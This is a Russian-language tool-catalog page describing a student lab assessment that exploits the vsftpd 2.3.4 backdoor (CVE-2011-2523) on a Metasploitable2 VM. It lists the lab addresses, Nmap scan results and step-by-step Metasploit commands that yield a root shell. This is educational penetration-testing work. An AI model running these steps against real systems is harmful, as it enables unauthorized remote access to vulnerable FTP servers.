Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
ethical-hacking-CVE-2011-2523 — Оценка этического хакинга | Практическое тестирование уязвимости бэкдора vsftpd 2.3.4 (CVE-2011-2523) на Metasploitable2 с использованием Kali Linux и Metasploit | Kitploit
Инструменты/GitHubGitHub/chathura123git/ethical-hacking-cve-2011-2523
Анализ уязвимостейЭксплуатацияCTFТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubchathura123git/ethical-hacking-cve-2011-2523

ethical-hacking-CVE-2011-2523

Оценка этического хакинга | Практическое тестирование уязвимости бэкдора vsftpd 2.3.4 (CVE-2011-2523) на Metasploitable2 с использованием Kali Linux и Metasploit

Репозиторий
43 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Этический взлом | Оценка 1

Практическое тестирование уязвимостей - CVE-2011-2523 (бэкдор vsftpd 2.3.4)

Модуль: - Этический взлом Университет: Лондонский столичный университет Программа: Бакалавр (с отличием) по кибербезопасности и судебной экспертизе

Правовой отказ

Все действия проводились в контролируемой, изолированной виртуальной лаборатории исключительно в образовательных целях. Реальные системы не подвергались атакам. Вся работа соответствует Закону о неправомерном использовании компьютеров 1990 года.

Лабораторная среда

  • ОС атакующего: Kali Linux (Хост)
  • IP атакующего: 192.168.56.1 (vboxnet0)
  • Целевая ВМ: Metasploitable2
  • Целевой IP: 192.168.56.103
  • Гипервизор: Oracle VirtualBox
  • Режим сети: Только хост (vboxnet0)

Выбранный CVE - CVE-2011-2523

  • ID CVE: CVE-2011-2523
  • Затронутое ПО: vsftpd 2.3.4
  • Затронутый порт: 21/tcp (FTP)
  • Оценка CVSS v3: 9.8 КРИТИЧЕСКАЯ
  • Вектор атаки: Сеть
  • Требуемые привилегии: Нет
  • Ссылка:
https://nvd.nist.gov/vuln/detail/CVE-2011-2523

Результаты сканирования Nmap

Порт 21/tcp - vsftpd 2.3.4 (ЦЕЛЬ) Порт 22/tcp - OpenSSH 4.7p1 Порт 23/tcp - Linux telnetd Порт 80/tcp - Apache httpd 2.2.8 Порт 139/tcp - Samba smbd 3.X Порт 445/tcp - Samba smbd 3.X Порт 3306/tcp - MySQL 5.0.51a Порт 6667/tcp - UnrealIRCd

Сводка эксплуатации

Шаг 1: nmap -sn 192.168.56.0/24 Шаг 2: nmap -sV 192.168.56.103 Шаг 3: msfconsole Шаг 4: use exploit/unix/ftp/vsftpd_234_backdoor Шаг 5: set RHOSTS 192.168.56.103 Шаг 6: set LHOST 192.168.56.1 Шаг 7: run Шаг 8: id && whoami

Ссылки

  • MITRE (2011) CVE-2011-2523. https://www.cve.org/CVERecord?id=CVE-2011-2523
  • NIST (2019) NVD CVE-2011-2523. https://nvd.nist.gov/vuln/detail/CVE-2011-2523
Скачать инструмент